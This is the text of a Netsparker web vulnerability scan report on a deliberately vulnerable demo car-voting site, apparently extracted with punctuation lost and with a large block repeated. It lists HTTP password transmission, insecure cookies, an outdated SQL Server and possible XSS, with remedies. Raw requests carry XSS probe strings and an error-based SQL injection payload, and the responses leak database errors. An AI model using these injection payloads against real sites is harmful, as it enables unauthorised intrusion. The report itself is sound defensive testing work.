nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
